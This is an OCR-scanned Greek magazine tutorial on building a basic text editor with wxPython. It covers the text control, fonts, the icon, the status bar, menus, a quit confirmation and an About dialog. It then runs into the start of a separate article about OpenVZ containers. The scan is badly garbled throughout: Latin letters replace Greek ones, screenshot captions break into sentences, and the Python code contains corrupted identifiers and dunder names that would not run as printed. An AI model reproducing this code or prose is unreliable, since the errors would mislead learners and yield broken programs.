Ctri+O 


Ctri+S 


5, **kw): 

._init_ (*args,**kw) 
[8 quit ctri+Q tylcon() 

΄ selr.icon.copyrromBitmap(wx.Bitmap("editor.ico",wx.BITMAP_TYPE_ANY)) 
self.Seticon(self.icon) 

self.InitEditor() 


def InitEditor(self): 
self.InitStatusBar() 
self.InitMenuBar() 
self.textctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE) 
self.textctrl.SetFocus() 
textfont = wx.Font(pointSize=12, family=wx.FONTFAMILY_DEFAULT, 
Istyle=wx.FONTSTYLE_ NORMAL, weight=wx.FONTWEIGHT_NORMAL) 
self.textctr|.SetFont(textfont) 
self.Show(True) 


def InitStatusBar(self): 
statusbar = self.CreateStatusBar() 
statusbar.SetStatusText("Ready”) 


[save current file 


γραφικὸς (Σ.τ.Ε. Θα βρἰζει κιόλας;) Gpa αναμένουμε va ἐχει µια κάποια 
φιλικότητα στο χρήστη, υπό την έννοια OT! θα μπορεί κἀποιος εὖκολα va 
βρει το close! Φυσικά, ὀλες του οι λειτουργίες θα εἶναι ορατἐς σε μενού κι 
OX! κρυμμένες πἰσω ano μυστήρια keyboard shortcuts. Πα την πρώτη µας 
απόπειρα, ωστόσο, εἶναι σκόπιμο να μείνουμε στην απλούστερη εκδοχή: 
ἑνα παράθυρο, στο οποίο μπορούμε να πληκτρολογήσουμµε κείμενο. 


Ὅσοι έχετε χρησιμοποιήσει κάποιο γραφικὀ περιβάλλον προγραμματισμού 
(ναι, δυστυχώς πάλι στη Visual Basic αναφἐρομαι) θα θυμάστε OT! υπάρ- 
χει κἀποιο widget στο onoio μπορούμε να πληκτρολογήσουμµε κείμενο. H 
VB το λέει TextBox και συνήθως το χρησιμοποιούμε για µια απλἠ εισαγω- 
γἡ κάποιας τιμής σε µια φόρμα (διάλογο). Το wxTextCtrl των wxWidgets 
(http://docs.wxwidgets.org/stable/wx_wxtextctrl.html#wxtextctrl) κάνει 
την ἰδια δουλειά και εἶναι κατάλληλο για να ξεκινήσουμε. 


H αρχικἡ µας εκδοχἠ δεν διαφέρει πολὺ ano το HelloWorld που γράψαμε 
στο τεύχος 012: Αντὶ για StaticText (To Label της VB) έχουμε Eva κατὰλ- 
ληλα διαμορφωμένο TextCtrl: 


import wx 
class wxEditor(wx.Frame): 
def _init__(self, *args, **kw): 
super(wxEditor,self).__init__(*args, **kw) 
self.InitEditor() 
def InitEditor(self): 
self.textctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE) 
self.textctr1l.SetFocus() 


| DEFAULT, style=wx.FO 


O wxEditor κάνει 
edit τον ...εαυτό 
του. Σας έλεγα ότι 
εἶναι χελώνες μέχρι 
κάτω, αλλά δεν το 
πιστεύατε! Δεξιά 
φαίνεται ο πιστός 
μας gvim - xw- 
piç αυτόν πώς θα 
ευχαριστιόµασταν 
να γράφουμε σε 
Python; Λέτε ὁταν 
ολοκληρώσουμε 
τον δικὀ µας editor 
να μετατοπιστούν 
οι προτιμήσεις µας; 
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self.Show(True) 
def main(): 
editor = wx.App() 
wxEditor(None, title="wxEditor") 


editor.MainLoop() 


if _name_ == '_main_': 
main() 
Για να δούµε λίγο Ta ενδιαφέροντα σημεία... 
self.textctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE) 


H γραμμή αυτή δημιουργεί το TextCtrl µας µε Tov ἰδιο τρὀπο που στο 
παλιό πρὀγραμμα εἰχαμε δημιουργήσει το StaticText. Δώστε ἐμφαση στο 
style: Μπορούμε µέσα and αυτή την παράμετρο να ορίσουµε κἀποια xa- 
ρακτηριστικἁ του TextCtrl, τα οποία εἶναι πολύ χρήσιμα. Δοκιμάστε va 
αφαιρέσετε To style και θα δείτε τι θα γίνει: O editor σας θα µετατρα- 
nei σε Eva µεγάλο textbox της µιας γραμμής! Στο documentation nou 
αναφέραμε πριν, μπορείτε να βρείτε τα διαφορετικά window styles που 
δέχεται το TextCtrl. Τι γίνεται ὀὁμως αν θέλουμε να χρησιμοποιήσουμε 
περισσότερα ano Eva μαζὶ; Αν π.χ. θέλουµε Eva multiline control και µε 
κεντραρισμένο κείμενο, γράφουμε: 


self.textctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE | wx.TE_ 
CENTRE) 


Αν έχετε πολλαπλές επιλογὲς τις χωρίζετε μεταξὺ τους µε την κάθετη 
μπάρα (|), το σύμβολο για bitwise OR της Python (http://en.wikipedia. 
org/wiki/Bitwise_operation#0R). Μην ξεχνάτε ὁτι Ta TE_MULTILINE, ΤΕ 
CENTRE κ.λπ., στην πραγµατικὀτητα εἶναι απλώς κάποιες σταθερέἑς τιμὲς 
(θυμάστε το pygame.locals;) και το OR κάνει µια πράξη μεταξύ τους. 


Την παραπάνω γραμμή θα μπορούσαμε να τη γράψουμε και χωρίς το self: 
textctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE) 


Έτσι όμως δεν θα εἰχαμε το textctrl διαθέσιμο αυτόματα σε ὀλες τις OU- 
ναρτήσεις της κλάσης µας, κάτι που θα χρειαστούμε παρακάτω (όταν 
έρθει η ώρα να φορτώσουμε και να αποθηκεύσουµε κείμενο, φυσικὰ). 


H γραμμὴ: 
textctr1.SetFocus() 


φέρνει το textctrl στο προσκήνιο, αμέσως μόλις εκτελέσουµε TO πρὸ- 
γραμμα. Θα ἦταν πολύ περἰεργο να πρέπει να κάνουμε κλικ στο παράθυ- 
po Tou editor για να γράψουμε! 


Μεγαλώνοντας τα γράμματα 


Αν εἰστε και κάποιας ηλικίας, ο απλὀς µας editor ἐχει ἠδη Eva πρὀβλη- 
μα: τα γράμματα εἶναι υπερβολικά μικρά. Σε ἑναν συντάκτη κειµένου 
TUNIKA χρησιμοποιούμε Eva μόνο μέγεθος γραμμάτων (συντάκτης εἶναι, 
ox! word processor) αλλά αυτό το Eva μέγεθος εἶναι συνήθως κάτι που 
µπορεί να ρυθμιστεί στα preferences. Εμείς δεν ἐχουμε (για την ὡρα) 
διάλογο preferences, αλλά τουλάχιστον μπορούμε να γράψουμε κάτι για 
να µεγαλώσουμε τα γράμματα. Πριν λοιπὸν ano το SetFocus, μπορούμε 
να προσθέσουμε τις εντολές: 


Python ἃ wxPython: The wxEditor Project! 


Dt a ASHE Tai a LL AO r ede ΜΕΝ ΙΛΞΑΣΜΨΜΜΕΜΜΑ 


textfont = wx.Font(pointSize=12, family=wx.FONTFAMILY_DEFAULT, 
style=wx.FONTSTYLE_NORMAL, 
weight=wx.FONTWEIGHT_NORMAL ) 

self.textctrl.SetFont(textfont) 


Χρειάστηκε να δημιουργήσουμε Eva αντικείµενο Wx.Font µε κἀποια anAd 
χαρακτηριστικά: Μέγεθος 12, προεπιλεγµένη γραμματοσειρὰἁ συστήμα- 
τος και χωρίς αλλαγές στο στυλ (π.χ. italics) ἡ στο βάρος (π.χ. bold). 
Δείτε λεπτομέρειες εδώ: http://docs.wxwidgets.org/stable/wx_wxfont. 
html#wxfontctor 


Topa, 000 και να ψάχνετε στο documentation του TextCtrl, δεν πρὀκειται 
να βρείτε τη συνάρτηση SetFont που έχουμε χρησιμοποιήσει. Μα καλά, 
πως δουλεύει τότε; Κοιτάξτε λίγο καλύτερα: Το TextCtrl προέρχεται ano 
κάποιες άλλες κλάσεις (derived from...) µια ano τις οποίες εἶναι και το 
wxWindow. Το SetFont εἶναι class function Tou wxWindow και το TextCtrl 
απλά το KAnpovouei. 


Πειραματιστείτε τώρα µε διάφορα μεγέθη, styles κ.λπ. Εμένα περιμένετε 
να σας το πω; Όταν τελειῶσετε ENIOTPEWTE εδώ, ἔχουμε «σοβαρή» dou- 
λειἁὰ να κάνουμε! 


Λίγος καλλωπισμός δεν βλάπτει! 


Εντάξει, unopei ο editor µας να εἶναι ακόµα απλοϊκός, αλλά Eva εικονίδιο 
πρέπει να το ἐχει. Δεν εἶναι δυνατὸν να βλέπουμε αυτό TO generic TE- 
τραγωνάκι στη γωνία! Έστω λοιπὸν ότι κατεβάσαμε Eva ωραίο εικονἰδιο 
και τῶρα θέλουμε να το βάλουμε. Εἶναι σε µορφή .ico (τα παλιά, κλασικά 
εικονίδια των Windows) αλλά το wxPython μπορεὶ να δεχθεἰ και ἄλλες 


stanel nv (ET Γι; orials/wy. 


Αυτό που ονοµά- 
Coupe χαϊδευτικά 
«μενού» εἶναι στην 
πραγματικότητα 
τρία αντικείμενα: 
Το MenuBar (σε 
μπλε), τα Menu 
(σε Κόκκινο) KAI 

τα Menultem (σε 
κίτρινο). Akoya και 
το gvim, η γραφική 
εκδοχή του vim, 
ενός γνωστού, 
σκληροπυρηνικού 
editor, υποκύπτει 
στη γοητεία των 
μενού - για να 

µη μιλήσουμε και 
για τη γραμμή 
εργαλείων απὀ 
κάτω! Καθόλου δεν 
μας προβληματί- 
ζει το γεγονός ότι 
*kal* σε αυτή την 
εκδοχή οἱ EVTOAEG 
εξακολουθούν να 
εἶναι ακατάληπτες. 
Τουλάχιστον οι 
«χρήστες» Bpi- 
σκουν το Quit... 


wthon/?/cource) - GVIM 


*kw): 


Close -close 95» 


__init__(*args,**kw) 
Save Ὃν Icon() 
= in ae tmap(wx.Bitmap("editor.ico",wx.BITMAP_TYPE_&é 
As... = 53ν - 
Split Diff with... 
Split Patched By... 
Print 
Save-Exit wqa extCtrl(self, style=wx.TE_MULTILINE) 
Exit :qa us() 


NTSTYLE_NORMAL, weight=wx.FONTWEIGHT_ NORMAL) 
self.textctrl.SetFont(textfont) 
self .Show(True) 


Soe ee eee ep OINtSiZe=12, family=wx.FONTFAMILY DEFAULT, s 
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μορφές εικὀνων. Μέσα στην _init_, και πριν τη κλήση self.InitEditor(), 


προσθέστε τις γραμμὲς: 


t 


self.icon = wx.EmptyIcon() self.icon.CopyFromBitmap(wx. 
Bitmap("editor.ico", wx.BITMAP_TYPE_ANY)) 


self.SetIcon(self.icon) 


Προφανώς, το wx.EmptyIcon() δημιουργεί ἑνα «λευκό» ἡ ἁδειο αν προτι- 
HATE εικονίδιο, το οποίο μετὰ γεµίζουµε αντιγράφοντας το editor.ico µέσα 
του. H SetIcon εἶναι, πιστεύουμε, προφανἠς. Θα χρησιμοποιήσουμε το 
ἴδιο εικονἰδιο και σε μελλοντικούς διαλόγους Tou editor µας. 


Γραμμή Κατάστασης (Status Bar) 


Τα περισσότερα προγράµµατα που δημιουργούν ἐγγραφα διαθέτουν µια 
μπάρα γνωστὴ ως γραμμὴ κατάστασης. Αυτἠ βρίσκεται στο κάτω μέρος 
του παραθύρου κι εκεἰ απεικονίζονται σύντομα μηνύματα για τη λειτουρ- 
yia του προγράµµατος, ὁπως επἰσης και σύντομες επεξηγἠσεις των ENI- 
λογὠν του μενού (καθὼς ο χρήστης τις διατρέχει µε το ποντίκι). Πα va 
αρχίσει το πρόγραµµα µας να ξεφεύγει aNd τη σπαρτιάτικη µορφή του vi, 
ας βάλουμε µια γραμμὴ κατάστασης. Προσθέστε λοιπὸν την παρακάτω 
συνάρτηση μέσα στην κλάση µας: 


def InitStatusBar(self): 
statusbar = self.CreateStatusBar() 
statusbar.SetStatusText ("Ready") 
και καλέστε την πρὠτη-πρώτη, μέσα στην InitEditor: 
def InitEditor(self): 
self .InitStatusBar() 


Αυτὸ εἶναι ὁλο. Θα δείτε ὁτι η μπάρα µας θα αποκτήσει δικἠ της ζωὴ μόλις 
αρχίσουμε να φτιάχνουμε το μενού. Αμέσως τώρα δηλαδή. 


To Menu, ο γνωστός µας άγνωστος! 


Όλοι γνωρίζουμε τα μενού φυσικἀ. Σχεδόν ὀλες οι παραθυρικὲς εφαρµο- 
γὲς διαθέτουν ano Eva. Λίγοι ὁμως γνωρίζουν NAG φτιάχνονται και πῶς 
συνδέονται µε το υπόλοιπο πρόγραµµα. Και ὀχι, το γεγονὸς ὁτι έχετε 
στήσει Eva Menu στη Visual Basic, δεν σας κάνει γνώστες |) 


Στην πραγματικότητα, λοιπὸν, αυτὀ που αποκαλούμε μενού της εφαρµο- 
γἠς εἶναι τουλάχιστον τρία διαφορετικά αντικείμενα: 


e H μπάρα του μενού, γνωστή ως wx.MenuBar, στην οποία φαίνονται 
οι KEVTPIKEG επιλογἑς 


ο Τα μενού που στην πραγματικότητα εἰναι οι KEVTPIKEG επιλογὲς 
στην μπάρα (π.χ., File, Edit, View, Tools, Help κ.ο.κ.) 


ο Ta αντικείμενα ἡ επιλογὲς των μενού, που εἶναι τα πραγματικἁ τους 
περιεχόμενα (menu items — π.χ. New, Open, Save, Save As, Quit, 
αν μιλάμε για Eva συνηθισμένο μενού File) 


H σχέση που τα συνδέει εἶναι η εξἠς: Ένα MenuBar περιέχει µια σειρἁ 
ano αντικείμενα Menu, τα οποία περιέχουν µια σειρά απὀ αντικείμενα 
Menultem. Apa πρέπει να φτιάξουμε μερικά αντικείμενα Menu, να Ta y£- 
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µίσουµε µε Menultem και να τα βάλουμε πάνω στο MenuBar. Εἶναι πιο 
εὐκολο ano ὁ,τι ακούγεται. Ας ξεκινήσουμε να φτιάχνουμε τη συνάρτηση 
InitMenuBar, nou θα βάλουμε µέσα στην κλάση µας: 


def InitMenuBar(self): 
menubar = wx.MenuBar() 
self.SetMenuBar (menubar) 


H γραμμή φυσικἁ θα δημιουργήσει µια μπάρα για το μενού - ὁπως ακρι- 


βὠς ἐγινε και για το StatusBar. Καλέστε την μέσα ano το InitEditor, ὁπως Ένας διάλογος 
κάναμε και για το StatusBar: About μπορεί va 
; i εἶναι πολύ απλός ἡ 

def InitEditor(self): αρκετά εντυπωσι- 
self. InitStatusBar() AKO: κί 

μάς παρέχει τη δυ- 

self.InitMenuBar() νατότητα και για Ta 

A ; : ‘ ; : δύο. Αριστερό εἶναι 

Μια ἄδεια γραμμὴ μενού δεν εμφανίζεται καν και δεν προκαλεἰ κανένα ο δικὀς µας Kal 
ενδιαφἑρον. Πάμε λοιπὸν να προσθέσουμε το μενού File kal τις αντἰστοι- δεξιά ο διάλογος 
χες επιλογἐς TOU: About του Bluefish, 
γνωστού και µη 

def InitMenuBar(self): εξαιρετέου editor 


που πλέον υπάρχει 


menubar = wx.MenuBar() kal yia Windows 


FileMenu = wx.Menu() (δεν έχετε καμιά 
δικαιολογία να µην 

FileMenuNew = FileMenu.Append(wx.ID_NEW, "&New...", τον εγκαταστή- 
σετε!) 


ο Untitled 0 - Bluefish 2.2.2 
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"Start a new session") 
FileMenuOpen = FileMenu.Append(wx.ID_OPEN,"&Open...", 
"Open a file") 
FileMenu.AppendSeparator() 
FileMenuSave = FileMenu.Append(wx.ID_SAVE,"&Save", 
"Save current file") 


FileMenuSaveAs = FileMenu.Append(wx.ID_SAVEAS, "Save &As...", 
"Save current file with a new name") 


FileMenu.AppendSeparator() 


FileMenuQuit = FileMenu.Append(wx.ID_EXIT, "Quit", "Quit 
wxEditor") 


menubar.Append(FileMenu, "&File") 
self.SetMenuBar (menubar) 


Ti θαύμα εἰναι αυτό! Όχι povo ἐχουμε το File Menu, αλλά (ανάλογα µε TO 
λειτουργικὀ) έχουμε και τα αντίστοιχα τυποποιημένα εικονίδια για New, 
Open, Save, Save As, Quit. Πώς γίνεται αυτό; Μα, ἐχουμε χρησιμοποιήσει 
τα τυποποιημένα id (wx.ID_NEW, wx.ID_OPEN κ.ο.κ.). Το μενού δηµιουρ- 
γείται µε την EVTOAN 


FileMenu = wx.Menu() 


ενώ προσθέτουµε menu items µε τη σειρἁ χρησιμοποιώντας απλά την 
append 


FileMenuNew = FileMenu.Append(wx.ID_NEW, "&New...", 
"Start a new session") 


Το «&» δημιουργεί Eva accelerator key µε TO συγκεκριµένο γράμμα. £ni- 
τρἐποντάς µας να επιλέξουμε, π.χ., την EVTOAN New, χρησιμοποιώντας 
τον συνδυασμό πλήκτρων [ALT+N]. H περιγραφἡ στο τέλος της γραμμής 
εµφανίζεται ως βοηθητικὀ κείµενο στο StatusBar — δεν σας εἶπα oT! θα 
ζωντανέψει; 


Έχοντας φτιάξει το μενού File και αφού ορίσουμε και τα Menultem, το 
προσθέτουμε στο MenuBar: 


menubar.Append(FileMenu, "&File") 


O editor µας ἐχει πάρει κάποια µορφή, αλλά το μενού δεν κάνει τίποτα! 
Θυμίζειτις εφαρμογές που γράφουν οι µαθητές σε Visual Basic. Συνήθως 
μόνο To interface δουλεύει :) Πρέπει, µε κάποιο τρόπο, να ενεργοποιἠ- 
σουµε αυτό το μενού και τις επιλογὲς του. 


Επεξεργασία Menu Events 


Θυμάστε την προηγούμενη φορά τι kåvape για τα wx.PAINT events; Σας 
θυμίζω OTI πρὀκειται για το event που µας στέλνει το λειτουργικό, όταν το 
παρἀθυρὀ µας καλυφθεἰ ano κάποιο ἆλλο και πρέπει να ξανασχεδιάσουµε 
τα περιεχὀμενά του. (Στον editor δεν ἐχουμε τέτοιο θέμα γιατἰ To TextCtrl 
επανασχεδιάζεται µόνο του, ὁπως επἰσης τα MenuBar και StatusBar.) Με 
παρόμοιο τρόπο, όταν επιλέξουμε κάτι απὀ éva Menu το πρόγραμμα μὰς 
OTEAVE! Eva event. Πρέπει λοιπὸν va το ανιχνεύσουμε και να το επεξεργα- 
στούμε µε µια δικἠ µας συνάρτηση, τον λεγόμενο event handler. Αμέσως 
μετὰ το self.SetMenuBar(menubar), μπορούμε να γράψουμε: 
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self.Bind(wx.EVT_MENU, self.OnQuit, FileMenuQuit) 


Όταν επιλέγεται το menu item FileMenuQuit, εκτελείται η συνάρτηση 
OnQuit της κλάσης µας. Μπορεὶ να εἶναι πολύ απλἠ, τουλάχιστον αρχικά: 


def OnQuit(self,eventobject): 
self.Close() 


Ξέρω, θα ρωτήσετετι εἶναι αυτό TO «eventobject». Σε κάθε event handler 
το σὐστημὰ µας στέλνει και ἑνα αντικείµενο, το ONOIO αντιπροσωπεύει το 
εἶδος του event που λήφθηκε. And το αντικείµενο AUTO μπορούμε να nå- 
poupe κάποιες χρήσιμες πληροφορίες. Παράδειγμα: Πα éva PAINT event 
θα μπορούσαμε να μάθουμε την περιοχή της οθὀνης που χρειάζεται va 
ξανασχεδιάσουµε (Θυμάστε τα προβλήματα που εἶχαμε στο πρόγραμμα 
HE TIG μπάρες χρωμάτων του προηγούμενου ἄρθρου;) Στη συγκεκριμένη 
περίπτωση, βέβαια, δεν µας ενδιαφέρει καμιά πληροφορία ano αυτές που 
περιέχει το eventobject. 


Ξέρετε OT! κάθε editor που σέβεται τον εαυτὀ του δεν αφήνει το χρήστη 
του va ...πυροβοληθεἰ στο πὀδι και να τον κλείσει, αν έχει κάνει κάποια 
αλλαγἡ στο κείμενο που δεν ἐχει αποθηκεύσει. Το γεγονὸς OT! ο editor 
μας ακόµα στερείται ικανότητα αποθήκευσης, εἶναι απλά µια μικρὴ Evo- 
Χλητική λεπτομέρεια. Θα πρέπει va µας ειδοποιεί ETO! και αλλιώς. Οπότε 
ας βελτιώσουμε κάπως την OnQuit: 


def OnQuit(self,eventobject): 
if self.textctrl.IsModified(): 


result = wx.MessageBox("Text has been modified. Quit 


|g) Untitled - WordOut 
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τους editors nnyai- 
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γράφαμε αντίστοι- 
χα προγράμματα 
και για Windows. 
Από το χρονοντού- 
Aano της Ιστορίας 
ο γράφων ανέσυρε 
δύο συντάκτες KEI- 
μένου (ο ἑνας εἰναι 
σχεδόν επεξεργα- 
στἠς κειμένου), 
που εἰχε γράψει 
πολλά χρόνια πριν 
σε Visual C++. 
Αγνοείται δυστυ- 
χώς η τύχη του 
τρίτου και καλύ- 
τερου (TextPad). 
Όχι ότι θα τον 
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µόνο Windows un- 
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μέσα σε Eva virtual 
machine. 
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anyway?","Really quit?",wx.YES_NO | wx.NO DEFAULT | wx.ICON_ 
EXCLAMATION) 


if result == wx.YES: 
self.Close() 
else: 
self.Close() 


Καθώς καταλαβαίνετε, εἶναι και µια ευκαιρία va δούμετην wx.MessageBox, 
που µας δίνει τους γνωστούς διαλόγους OK/Cancel, Yes/No, Μπουγάτσα 
µε κρἐµα/Μπουγάἀτσα µε τυρὶ (µε κρέμα εἶναι To default) κ.λπ. Στις na- 
ραμέτρους ορἰσαµε πλήκτρα YES/NO, To NO ως default και το τυποποι- 
ημένο εικονίδιο ICON_EXCLAMATION του συστήματος, το οποίο τονίζει 
ότι «Κάτι Kako (TM) θα συμβεί, αν απαντήσεις απρὀσεκτα σε αυτή την 
ερὠτηση». 


Δοκιμάστε τώρα να τρέξετε το πρὀγραµμα και να επιλέξετε File > Quit, 
ἐχοντας πρώτα γράψει κάτι στον editor. Θα Seite το μήνυμα να εμφανἰζε- 
ται και, av πιέσετε Νο, απλἀ θα επιστρέψετε στον editor. Προς Θεού, δεν 
θέλουμε να χάσετε τα δεδομένα σας (αν μπορείτε αποθηκεύστε τα όμως, 
σας προκαλώ :)) H συνάρτηση IsModified() επιστρέφει True αν το nepi- 
εχόµενο του TextCtrl έχει αλλάξει. Ευτυχώς για µας, αυτή η λειτουργἰα 
παρέχεται ano το ἴδιο To TextCtrl. 


Βέβαια, αν εἶστε παρατηρητικοἰ θα δείτε ότι µπορείτε πάντα να κλείσετε 
το πρὀγραμμµα ano το (X) του παραθύρου και τότε δεν θα πάρετε κανένα 
μήνυμα. Nati; 


Πατί φυσικἀ ἄλλο To Close event (wx.EVT_CLOSE) του παραθύρου (για 
το οποίο εκτελεἶται and προεπιλογἠ το κλείσιμο της εφαρμογἠς ὁπως 
έχουμε δει) κι GAAO το wx.EVT_MENU OnQuit που φτιάξαμε εμείς. Iða- 
νικά, θα ἐπρεπε να καλούν και τα δύο την ἴδια συνάρτηση, την OnQuit. 
Και αυτό ακριβώς μπορούμε να κάνουμε, προσθέτοντας ἄλλη µια bind 
ακριβώς κάτω and την πρώτη: 


self.Bind(wx.EVT_CLOSE, self.OnQuit) 
Αλλάξτε επἰσης και To self.Close(), σε 
self.Destroy() 


Γιατί; Μα, av πιέσετε το (X) θα στείλετε Eva wx.EVT_CLOSE που θα Ka- 
λέσει την OnQuit. Πα να κλείσετε την εφαρµογή θα επιλέξετε Yes, ONOTE 
θα εκτελεστεί το self.Close() και θα στείλει Eva Wx.EVT_CLOSE, το οποίο 
θα καλέσει την OnQuit και εσεἰς θα απαντήσετε ξανά Yes, οπὀτε θα EKTE- 
λεστεἰ το self.Close() και θα στείλει Eva wx.EVT_CLOSE, το οποίο θα 
καλέσει την OnQuit και εσεἰς θα απαντήσετε ξανά Yes, ONOTE ...χελὠνες 
μέχρι κάτω |) 


To About Box 


Κάθε εφαρµογἠ που σέβεται τον εαυτὸ της διαθέτει Eva ἑστω και απλὀ 
about box. Προσθέτουμε λοιπὸν τις απαραἰτητες γραμμὲς για Eva menu 
Help µε Tov αντίστοιχο διάλογο. 


Μέσα στην InitMenuBar θα έχουμε πλέον: 


HelpMenu = wx.Menu() 


HelpMenuAbout = HelpMenu.Append(wx.ID_ABOUT, 
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"&About...","Copyright and other info") 

menubar .Append(FileMenu, "&File") 

menubar .Append(HelpMenu, "&Help") 

self.SetMenuBar (menubar ) 

self.Bind(wx.EVT_MENU, self.OnQuit, FileMenuQuit) 

self.Bind(wx.EVT_CLOSE, self.OnQuit) 

self.Bind(wx.EVT_MENU, self.OnAbout, HelpMenuAbout ) 
Και φυσικά, €vd απλό about box θα ἦταν: 


def OnAbout(self,eventobject): 


aboutdlg = wx.MessageDialog(self,"The wxEditor, a deltaHacker 
Project", "wxEditor", wx.OK |wx.ICON_INFORMATION) 


aboutd1lg.ShowModal() 


Βλέπουμε και το wx.MessageDialog, µε κάποιες παραπάνω λειτουργίες 
ano To MessageBox που εἶδαμε πριν. To aboutdlg δεν εμφανίζεται au- 
τόµατα µε τη δημιουργία του (όπως ἐγινε πριν στο messagebox), αλλά 
όταν καλέσουµε: 


aboutd1lg.ShowModal() 


To Modal σημαίνει ὁτι την wpa που εμφανίζεται ο διάλογος δεν μπορού- 
µε να κάνουμε κάποια ἄλλη λειτουργία στο πρὀγραμμα, μέχρι να τον 
κλείσουμε. H πρώτη παράμετρος Tou MessageDialog, ὀπου έχουμε δώσει 
«self» ορίζει To parent window γι’ αυτὸν το διάλογο. Αν δώσετε None το 
παράθυρο θα εµφανιστεἰ κανονικἀ, αλλά µια και δεν θα ἐχει για parent το 
κεντρικὀ παράθυρο της εφαρμογἠς δεν θα κληρονομήσει και το εικονἰδιο. 
Τζάμπα το φτιάξαμε; Πρέπει να πούμε βέβαια ὅτι η wxPython ἐχει πιο εἰ- 
δικἀ παράθυρα για About Dialogs, αλλά αυτά θα τα ψάξουμε σε επόμενα 
άρθρα µας. 


Μέχρι την επόμενη φορὰ ὅμως, µπορείτε: 
ο Na φτιάξετε και τα υπόλοιπα μενού του editor (απλό) 


ο Να προσπαθἠσετε να κάνετε κάποια ano τα Open/Save/New να λει- 
τουργούν (θα χρειαστεἰ φυσικά να διαβάσετε το documentation). 
Ως anAn λύση, φτιάξτε το Save να δουλεύει µε EVA συγκεκριµένο 
ὀνομα αρχείου. 


ο Να σκεφτεἰτετι διαλόγους για επιλογὲς (preferences) θα θέλατε να 
ἐχει ο δικὸς σας editor. 


Το πρὀγραμμἁ µας, µε τη μορφή που ἐχει τη στιγµή που γράφεται το na- 
pov, µπορείτε να το κατεβάσετε aNd το 


http://bit.ly/dh@13wxeditorsrc 


Ὅπως πάντα, ξενυχτήστε ελεύθερα! Εγώ, πάντως, µε TOON συζήτηση για 
μενού neivaoa! Επιτρέψτε µου να σας αφήσω για να απαντήσω επειγὀ- 
ντως στον Modal διάλογο «πίτσα ἡ σουβλάκι». Δεν κλείνει µε τίποτα, ο 
ἄτιμος |) 
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Δεν θα ἦταν ωραία αν μπορούσαμε να τρέχουμε ὀλα Ta virtual machines 
μας, σε ἑνα μόνο μηχάνημα; Δεν θα ἦταν ακόµα καλύτερα αν εἶχαμε πρὀ- 
σβαση o’ ὀλες τις EIKOVIKEG μηχανές, µέσω δικτύου; Προφανώς, θα µου 
πείτε, αλλά θα σκεφτείτε ὁτι κάτι τέτοιο αποτελεἰ ακριβὀ χόμπι! ‘Eva un- 
χάνημα, ικανό να σηκώσει πέντε p’ ἑξι EIKOVIKEG μηχανές, µε το VirtualBox 
ἡ To VMware, χρειάζεται αρκετά ισχυρὀ hardware, το onoio καλὸ θα ἦταν 
να υποστηρίζει κι ὀλες τις OXETIKEG τεχνολογἱες (virtualization). AUTO το 
τελευταῖο σηµαίνει OT! το μηχάνημα θα έπρεπε να εἶναι και σχετικἀ σύγ- 
χρονο. Με άλλα λόγια, το μηχάνημα που επιτρέπει την *opaàñ* λειτουρ- 
yia πολλών εικονικὠν μηχανών, εἶναι ακριβὀ. Μήπως ὀμως παραβλέπουµε 
κάτι; Ta VirtualBox και VMware δεν αποτελούν μονόδρομο. Υπάρχει κά- 
ποιος ἄλλος τρόπος να πετύχουμε TO σκοπὸ µας, χωρὶς να καταξοδευ- 
τούμε. Στη συνέχεια θα εξερευνήσουμε GUTOV τον τρόπο και θα μάθουμε 
πώς μπορούμε να μετατρέψουμε Eva παλιὸ netbook ἡ Eva παροπλισμένο 
PC, σ’ Eva ολοκληρωμένο εργαστἠριο/δίκτυο εικονικὠν μηχανών! Τι λέτε, 
ξεκινάμε; 


H αναγκαία εισαγωγή... 


Καταρχάς, όλα τα δηµοφιλἠ προγράμματα virtualization, ὁπως το VMware 
και To VirtualBox, τρέχουν πάνω ano κάποιο λειτουργικὀ σύστημα. Ἔτσι, 
η χρήση αυτών των προγραμμάτων προὐποθέτει τη λειτουργία ενὸς πρὀ- 
σθετου συστήµατος, πέρα ano τις εικονικὲς μηχανές που θέλουμε να στἠ- 
OOUHE, HE Td εικονικἁ τους λειτουργικἀ. Μιλάμε δηλαδἠ για µεγάλη επιβά- 
ρυνση, όταν το μηχάνημά µας εἶναι παλιό κι έχει περιορισμένη ισχύ. Έτσι, 
για να εξοικονοµήσουµε ὁσο το δυνατὸν περισσότερους πόρους για τις 
EIKOVIKEG μηχανές, θα OTPAMOUHE σε µια λιγότερη δηµοφιλἠ αλλά ἄκρως 
αποδοτικἠ λύση: Ονομάζεται OpenVZ. Σας θυμίζει τίποτα το OpenVZ; Το 
εἰχαμε συναντήσει στην εισαγωγἠ της σειράς ἄρθρων VPS first contact, 
στο τεύχος 005. Πα ὁσους δεν xouv ιδέα περὶ τίνος μιλάμε, πρὀκει- 
ται για την τεχνολογία που χρησιμοποιούν αρκετοί VPS providers. Στην 
πραγματικότητα δεν πρὀκειται για πλήρες virtualization. Με το OpenVZ 
δεν δημιουργούνται ανεξάρτητες EIKOVIKEG μηχανές αλλά πλήρως αποµο- 
νωμένα κελιά, καθένα ano τα οποία τρέχει Linux. Σημειώστε ὁμως OTI Ta 
συστήματα εντὸς των κελιῶν μοιράζονται τον ἰδιο πυρήνα. Φανταστείτε 
αυτά τα κελιἀ σαν εξελιγμένα root jails. Αναρωτιέστε τι κερδίζουμε µε 
va τέτοιο σύστημα; Πάρα πολλὰ! H κατανάλωση της RAM εἶναι ελάχιστη, 
αφού το κάθε κελὶ δεν χρειάζεται να φορτώνει vav ολόκληρο πυρήνα 
στη μνήμη, μαζί µε τους απαραίτητους device drivers. Όλα αυτά βρἰσκο- 
νται ἠδη στη μνήμη (τα ἐχει φορτώσει το host OS) και δεν χρειάζεται να 
δημιουργηθούν αντίγραφα. Επιπρὀσθετα, η διαχείριση των EIKOVIKMV συ- 
στημάτων γίνεται εύκολα και ταχύτατα. Έτσι, µε τη βοήθεια του OpenVZ 
μπορούμε να τρέχουμε *NOAAEG* EIKOVIKEG μηχανές, σε EVA σύστημα µε 
πραγματικἀ περιορισμένους πόρους. Βέβαια, όλα τα εικονικἀ μηχανήματα 
θα πρέπει να τρέχουν Linux. Αυτός ο περιορισμός επιβάλλεται and τον 
ἴδιο τον τρὀπο λειτουργίας του OpenVZ. Εφόσον αυτὸ εκτελεἰται σε Linux 
